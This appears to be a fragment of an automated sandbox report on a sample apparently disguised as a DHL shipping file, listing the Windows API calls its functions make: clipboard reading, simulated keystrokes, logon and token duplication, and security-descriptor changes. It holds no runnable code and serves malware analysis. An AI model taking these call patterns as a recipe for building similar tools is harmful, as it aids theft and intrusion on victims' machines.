                                                                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                      • String ID:
                                                                                      • API String ID: 3667716007-0
                                                                                      • Opcode ID: daf9e49119ce2cbf30fa5dbefb4975955abf25adfe1cef76e6df154001b9c16f
                                                                                      • Instruction ID: 034d9628949f84786b81b8f232e924233e59fd48231081ae70f0eb93288e6dd5
                                                                                      • Opcode Fuzzy Hash: daf9e49119ce2cbf30fa5dbefb4975955abf25adfe1cef76e6df154001b9c16f
                                                                                      • Instruction Fuzzy Hash: CCE086223042440BCA08BB79A85657DB75ADBD7351F40557EF157631A2DE2889494371
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00DE0704,?,?,00000000,?,00DE0704,00000000,0000000C), ref: 00DE03B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: dfaed938351837801a572ca9168a74b5b5485063e0f753c9753c02e7309c4a34
                                                                                      • Instruction ID: 04d0ab402e6c53dcb3e81a9e009ba1dda7db6b7fcfd3ab6430dec21e648aa906
                                                                                      • Opcode Fuzzy Hash: dfaed938351837801a572ca9168a74b5b5485063e0f753c9753c02e7309c4a34
                                                                                      • Instruction Fuzzy Hash: 3ED06C3204010DBFDF028F85DD0AEDA3FAAFB48714F114000BE5866020C732E821AB90
                                                                                      APIs
                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00DA1CBC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoParametersSystem
                                                                                      • String ID:
                                                                                      • API String ID: 3098949447-0
                                                                                      • Opcode ID: b25604f0024ebf76e620c229cd04a4928b17758f17197ad3636a3dd412b61ad5
                                                                                      • Instruction ID: c46c2efb985f7ffc88e1c87b23e91c02ca8a09f570e80322764021c1e390731a
                                                                                      • Opcode Fuzzy Hash: b25604f0024ebf76e620c229cd04a4928b17758f17197ad3636a3dd412b61ad5
                                                                                      • Instruction Fuzzy Hash: 7CC04836280308AFE2148B96AC4AF107B64A748B00F148001F64DB95E382A268A8AA61
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(000001F4), ref: 00FEEEA9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1751009954.0000000000FEC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FEC000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_fec000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                      • Instruction ID: 8b3d2a36cfa49d5cd8c32425e4994a3c46c3bec4f50fa4ea8e19fcb19303ec93
                                                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                      • Instruction Fuzzy Hash: 6CE0BF7498024DEFDB00DFA4D5496DE7BB4EF04301F1005A1FD05D7680DB309E549A62
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(000001F4), ref: 00FEEEA9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1751009954.0000000000FEC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FEC000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_fec000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                      • Instruction ID: 9d1eeaedcb9e6a47dabc0c625a4451cafc58748b228d114cb5a428096fee14f7
                                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                      • Instruction Fuzzy Hash: 79E0E67498024DEFDB00DFB4D54969E7BB4EF04301F100161FD01D2280D6309D509A62
                                                                                      APIs
                                                                                        • Part of subcall function 00DB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00DB9BB2
                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00E3961A
                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E3965B
                                                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00E3969F
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E396C9
                                                                                      • SendMessageW.USER32 ref: 00E396F2
                                                                                      • GetKeyState.USER32(00000011), ref: 00E3978B
                                                                                      • GetKeyState.USER32(00000009), ref: 00E39798
                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E397AE
                                                                                      • GetKeyState.USER32(00000010), ref: 00E397B8
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E397E9
                                                                                      • SendMessageW.USER32 ref: 00E39810
                                                                                      • SendMessageW.USER32(?,00001030,?,00E37E95), ref: 00E39918
                                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00E3992E
                                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00E39941
                                                                                      • SetCapture.USER32(?), ref: 00E3994A
                                                                                      • ClientToScreen.USER32(?,?), ref: 00E399AF
                                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00E399BC
                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E399D6
                                                                                      • ReleaseCapture.USER32 ref: 00E399E1
                                                                                      • GetCursorPos.USER32(?), ref: 00E39A19
                                                                                      • ScreenToClient.USER32(?,?), ref: 00E39A26
                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E39A80
                                                                                      • SendMessageW.USER32 ref: 00E39AAE
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E39AEB
                                                                                      • SendMessageW.USER32 ref: 00E39B1A
                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E39B3B
                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E39B4A
                                                                                      • GetCursorPos.USER32(?), ref: 00E39B68
                                                                                      • ScreenToClient.USER32(?,?), ref: 00E39B75
                                                                                      • GetParent.USER32(?), ref: 00E39B93
                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E39BFA
                                                                                      • SendMessageW.USER32 ref: 00E39C2B
                                                                                      • ClientToScreen.USER32(?,?), ref: 00E39C84
                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E39CB4
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E39CDE
                                                                                      • SendMessageW.USER32 ref: 00E39D01
                                                                                      • ClientToScreen.USER32(?,?), ref: 00E39D4E
                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E39D82
                                                                                        • Part of subcall function 00DB9944: GetWindowLongW.USER32(?,000000EB), ref: 00DB9952
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E39E05
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                      • String ID: @GUI_DRAGID$F$p#
                                                                                      • API String ID: 3429851547-638943876
                                                                                      • Opcode ID: 905947ac57c01785536362f0b37967e79928b63b83f4d649d6b9405e8cd1aef9
                                                                                      • Instruction ID: 6364ef79372778619df3744530734f8bb465e6eb59365b8265b60b60b814c09b
                                                                                      • Opcode Fuzzy Hash: 905947ac57c01785536362f0b37967e79928b63b83f4d649d6b9405e8cd1aef9
                                                                                      • Instruction Fuzzy Hash: A542AD31205300AFD724CF28CC49AAABFE5FF89714F101659F699A72A2D7B1E854CF52
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00E348F3
                                                                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00E34908
                                                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00E34927
                                                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00E3494B
                                                                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00E3495C
                                                                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00E3497B
                                                                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00E349AE
                                                                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00E349D4
                                                                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00E34A0F
                                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00E34A56
                                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00E34A7E
                                                                                      • IsMenu.USER32(?), ref: 00E34A97
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E34AF2
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E34B20
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E34B94
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00E34BE3
                                                                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00E34C82
                                                                                      • wsprintfW.USER32 ref: 00E34CAE
                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E34CC9
                                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00E34CF1
                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E34D13
                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E34D33
                                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00E34D5A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                      • String ID: %d/%02d/%02d
                                                                                      • API String ID: 4054740463-328681919
                                                                                      • Opcode ID: 6021a12ccc0382dc962ee3cfc6c6d2f3df0dbb27371e921cb8b5aac5a52a12c9
                                                                                      • Instruction ID: f61e9d571686e0c90b2488ef4509e99358830ae7a2c12d5d54c0bccab588f14e
                                                                                      • Opcode Fuzzy Hash: 6021a12ccc0382dc962ee3cfc6c6d2f3df0dbb27371e921cb8b5aac5a52a12c9
                                                                                      • Instruction Fuzzy Hash: 2712DEB1600218ABEB248F25CC4DFAE7FE8EF45714F145119F516FA2E1DB74AA41CB60
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00DBF998
                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DFF474
                                                                                      • IsIconic.USER32(00000000), ref: 00DFF47D
                                                                                      • ShowWindow.USER32(00000000,00000009), ref: 00DFF48A
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00DFF494
                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DFF4AA
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00DFF4B1
                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DFF4BD
                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00DFF4CE
                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00DFF4D6
                                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00DFF4DE
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00DFF4E1
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DFF4F6
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00DFF501
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DFF50B
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00DFF510
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DFF519
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00DFF51E
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DFF528
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00DFF52D
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00DFF530
                                                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00DFF557
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                      • String ID: Shell_TrayWnd
                                                                                      • API String ID: 4125248594-2988720461
                                                                                      • Opcode ID: 3ddc61f5b3c7bb35b1ae7768c2c58fb47e7a4e44802365f256f6ea0dfe9c04c2
                                                                                      • Instruction ID: 83214566699fbb83212da80be72e7b826d0eb60a8e59fc773bb2d402e299f79f
                                                                                      • Opcode Fuzzy Hash: 3ddc61f5b3c7bb35b1ae7768c2c58fb47e7a4e44802365f256f6ea0dfe9c04c2
                                                                                      • Instruction Fuzzy Hash: 9A313671A4021CBFEB205BB65C4AFBF7E6CEB44B50F254065F601F61D1C6B19900AB61
                                                                                      APIs
                                                                                        • Part of subcall function 00E016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E0170D
                                                                                        • Part of subcall function 00E016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E0173A
                                                                                        • Part of subcall function 00E016C3: GetLastError.KERNEL32 ref: 00E0174A
                                                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00E01286
                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00E012A8
                                                                                      • CloseHandle.KERNEL32(?), ref: 00E012B9
                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E012D1
                                                                                      • GetProcessWindowStation.USER32 ref: 00E012EA
                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 00E012F4
                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E01310
                                                                                        • Part of subcall function 00E010BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E011FC), ref: 00E010D4
                                                                                        • Part of subcall function 00E010BF: CloseHandle.KERNEL32(?,?,00E011FC), ref: 00E010E9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                      • String ID: $default$winsta0$Z
                                                                                      • API String ID: 22674027-1808616255
                                                                                      • Opcode ID: 5c5d7b01839a95a32f5051a23487b4bbcd1444a8f699b79318585e9a0a08204f
                                                                                      • Instruction ID: e8e8bbf4092def4502f4e52036051ee03c4c8c6aa8d64416be92fd313006db42
                                                                                      • Opcode Fuzzy Hash: 5c5d7b01839a95a32f5051a23487b4bbcd1444a8f699b79318585e9a0a08204f
                                                                                      • Instruction Fuzzy Hash: C6817A71900209AFDF219FA5DC49BEE7BB9EF04708F1451A9F921BA1A0C7758998CB21
                                                                                      APIs
                                                                                        • Part of subcall function 00E010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E01114
                                                                                        • Part of subcall function 00E010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E00B9B,?,?,?), ref: 00E01120
                                                                                        • Part of subcall function 00E010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E00B9B,?,?,?), ref: 00E0112F
                                                                                        • Part of subcall function 00E010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E00B9B,?,?,?), ref: 00E01136
                                                                                        • Part of subcall function 00E010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E0114D
                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E00BCC
                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E00C00
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00E00C17
                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00E00C51
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E00C6D
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00E00C84
                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E00C8C
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00E00C93
                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E00CB4
                                                                                      • CopySid.ADVAPI32(00000000), ref: 00E00CBB
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E00CEA
                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E00D0C
                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E00D1E
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E00D45
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00E00D4C
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E00D55
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00E00D5C
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E00D65
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00E00D6C
                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00E00D78
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00E00D7F
                                                                                        • Part of subcall function 00E01193: GetProcessHeap.KERNEL32(00000008,00E00BB1,?,00000000,?,00E00BB1,?), ref: 00E011A1
                                                                                        • Part of subcall function 00E01193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E00BB1,?), ref: 00E011A8
                                                                                        • Part of subcall function 00E01193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E00BB1,?), ref: 00E011B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                      • String ID:
                                                                                      • API String ID: 4175595110-0
                                                                                      • Opcode ID: 9b4e9bc80e3acc011bb300225f15ae9e1bf38164a79a6d2cab42fa759cfbb472
                                                                                      • Instruction ID: b3347691099518833f9e10bbfb5b88d191c04cfaa9b44ae2bef1b2ab23744928
                                                                                      • Opcode Fuzzy Hash: 9b4e9bc80e3acc011bb300225f15ae9e1bf38164a79a6d2cab42fa759cfbb472
                                                                                      • Instruction Fuzzy Hash: 9E71477290020AAFDF10DFA5DC48BAEBBB8BF04314F144515E914B6291D771EA89CBB0
                                                                                      APIs
                                                                                      • OpenClipboard.USER32(00E3CC08), ref: 00E1EB29
                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00E1EB37
                                                                                      • GetClipboardData.USER32(0000000D), ref: 00E1EB43
                                                                                      • CloseClipboard.USER32 ref: 00E1EB4F
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00E1EB87
                                                                                      • CloseClipboard.USER32 ref: 00E1EB91
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00E1EBBC
                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00E1EBC9
                                                                                      • GetClipboardData.USER32(00000001), ref: 00E1EBD1
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00E1EBE2
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00E1EC22
                                                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 00E1EC38
                                                                                      • GetClipboardData.USER32(0000000F), ref: 00E1EC44
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00E1EC55
                                                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00E1EC77
                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00E1EC94
                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00E1ECD2
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00E1ECF3
                                                                                      • CountClipboardFormats.USER32 ref: 00E1ED14
                                                                                      • CloseClipboard.USER32 ref: 00E1ED59
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                      • String ID:
                                                                                      • API String ID: 420908878-0
                                                                                      • Opcode ID: 51f1667e3fad1291c9b6b0569243363a62844591b13e7b576216c5da43a1301a
                                                                                      • Instruction ID: eb76b74552e34c41eda4e24e146d7de438c1aadd06708669679615f27c073347
                                                                                      • Opcode Fuzzy Hash: 51f1667e3fad1291c9b6b0569243363a62844591b13e7b576216c5da43a1301a
                                                                                      • Instruction Fuzzy Hash: 5161D0352043059FD310EF25D889FAABBE4EF85708F185519F856B72A1CB30DD89CBA2
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E169BE
                                                                                      • FindClose.KERNEL32(00000000), ref: 00E16A12
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E16A4E
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E16A75
                                                                                        • Part of subcall function 00DA9CB3: _wcslen.LIBCMT ref: 00DA9CBD
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E16AB2
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E16ADF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                      • API String ID: 3830820486-3289030164
